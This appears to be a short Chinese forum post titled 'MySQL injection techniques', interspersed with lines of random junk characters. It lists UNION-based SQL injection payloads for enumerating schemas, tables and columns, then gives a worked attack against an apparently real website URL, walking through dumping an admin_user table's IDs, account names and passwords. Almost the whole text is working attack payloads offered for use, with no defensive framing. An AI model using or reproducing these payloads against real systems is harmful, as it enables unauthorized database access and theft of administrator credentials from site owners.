mysql注入技巧

admin

查库

% A' k' N  R6 L7 ]6 P( Qid=-1 union select 1,..,SCHEMA_NAME,n  from/**/information_schema.SCHEMATA limit 1,1/*

( p6 x& r5 [. A- k查表
5 Z, x7 p7 t( }- m7 @  v
9 Z% @" A! {+ V) X" yid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1

查段
9 E' i4 G) l: x
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
8 `1 F- `+ G) S
" c) q- N; T( _4 N$ c+ m# D
3 ?8 ~5 ?, {7 i' |* L& Wmysql5高级注入方法暴表

+ `! T2 q  D5 F2 S. N( t+ v例子如下:
: \! ^# R* e( x
1.爆表
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*    (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
这样爆到第4个时出现了admin_user表。
- D0 c  P' u, |: \- G( B
2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
) K# n% P+ Y7 G8 h

2 M/ R/ ~- y0 y& u! h' h3.爆密码
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
- {& ^& r! r! Z* i9 `) \+ D! U2 \9 h